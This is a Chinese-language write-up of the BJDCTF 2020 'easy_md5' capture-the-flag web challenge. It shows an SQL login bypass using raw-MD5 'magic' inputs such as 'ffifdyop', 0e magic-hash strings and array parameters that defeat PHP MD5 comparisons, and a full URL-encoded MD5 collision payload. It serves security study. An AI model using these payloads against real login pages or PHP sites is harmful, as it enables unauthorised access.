[BJDCTF 2020]easy_md5
[BJDCTF 2020]easy_md5 wp
信息搜集
进入题目,页面内容如下:
![[BJDCTF 2020]easy_md5_第1张图片](http://img.e-com-net.com/image/info8/e25fc16894d44d9e825401d1f4acc2a1.jpg)
查看源代码,没有发现什么有价值的信息。
提交查询时抓包,发包后出现提示:
![[BJDCTF 2020]easy_md5_第2张图片](http://img.e-com-net.com/image/info8/338b7cbfe99e4150a765f9a22fbb24f8.jpg)
给了一句 SQL 代码的提示。
经过 md5 加密变成万能密码
参考博客:https://www.cnblogs.com/tqing/p/11852990.html
select * from 'admin' where password=md5($pass,true)
一些字符串经过 MD5 加密后会变成万能密码的形式:
ffifdyop :
![[BJDCTF 2020]easy_md5_第3张图片](http://img.e-com-net.com/image/info8/ef2fb47dace2478fb58741d300e01501.jpg)
129581926211651571912466741651878684928 :
![[BJDCTF 2020]easy_md5_第4张图片](http://img.e-com-net.com/image/info8/944005deeb9c4f99808df5455ad18ee8.jpg)
所以这里理论上直接传入参数 password=ffifdyop 或者 password=129581926211651571912466741651878684928 就行,这里不知道为什么,burp 发包得到的返回结果始终是 200 OK ,只有去 web 页面测试才会跳转到 levels91.php 页面,而且只有 ffifdyop 这个 payload 测成功了,不知道是不是长度限制的问题。
MD5 加密弱比较和强比较的绕过
levels91.php 页面:
![[BJDCTF 2020]easy_md5_第5张图片](http://img.e-com-net.com/image/info8/152e21af6400457dbab9802791c21c1f.jpg)
查看源代码,源代码中给出了这样一段注释信息:
弱比较的绕过
科学记数法绕过
如果两个字符经 MD5 加密后的值为 0exxxxx 形式,就会被认为是科学计数法,且表示的是 0*10 的 xxxx 次方,还是零,都是相等的。
下列的字符串的 MD5 值都是 0e 开头的:
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
get 传参 ?a=QNKCDZO&b=240610708
数组绕过
get 传参 ?a[]=1&b[]=2
关于数组绕过的原理,我会详细解释一下,首先需要重新理解一下 URL 传参。
URL 传参
URL 传参的时候,可以直接传入参数:para=123
也可以用数组形式分段传入:para[]=1¶[]=2¶[]=3 分段传入的数据在服务器会被拼接成一个整体,即 123 ,这种传参方式与第一种没有区别。
还可以同一参数名多次传参:para=1¶=2¶=3 ,与前两种没有区别。
这就是为什么 URL 中可以用数组传参。
绕过原理
PHP 的 MD5 函数是无法处理数组的,在处理数组时会返回 NULL ,两边都返回 NULL ,那么就相等了。
条件
数组绕过是有条件的,PHP 8 是无法使用数组绕过的。
MD5 碰撞
直接找两个本身不一样但是 MD5 加密后一样的字符串。这个过程称为 MD5 碰撞。
payload
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
payload 来源
版权声明:本文为CSDN博主「小 白 萝 卜」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/EC_Carrot/article/details/109525162
绕过后跳转到 levell14.php 页面,其内容为:
强比较的绕过
在弱比较的绕过中,后两种都是可以的。
数组绕过
原理在弱比较的绕过中已经讲了,这里直接上 payload :
POST 传参:param1[]=1¶m2[]=2
拿到 flag :
![[BJDCTF 2020]easy_md5_第6张图片](http://img.e-com-net.com/image/info8/419990b1b3b847709faaa6d9553f11ec.jpg)
MD5 碰撞
POST 传参:
param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2¶m2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
拿到 flag :
![[BJDCTF 2020]easy_md5_第7张图片](http://img.e-com-net.com/image/info8/80ba8f0f588c44b78a000512fce6f8db.jpg)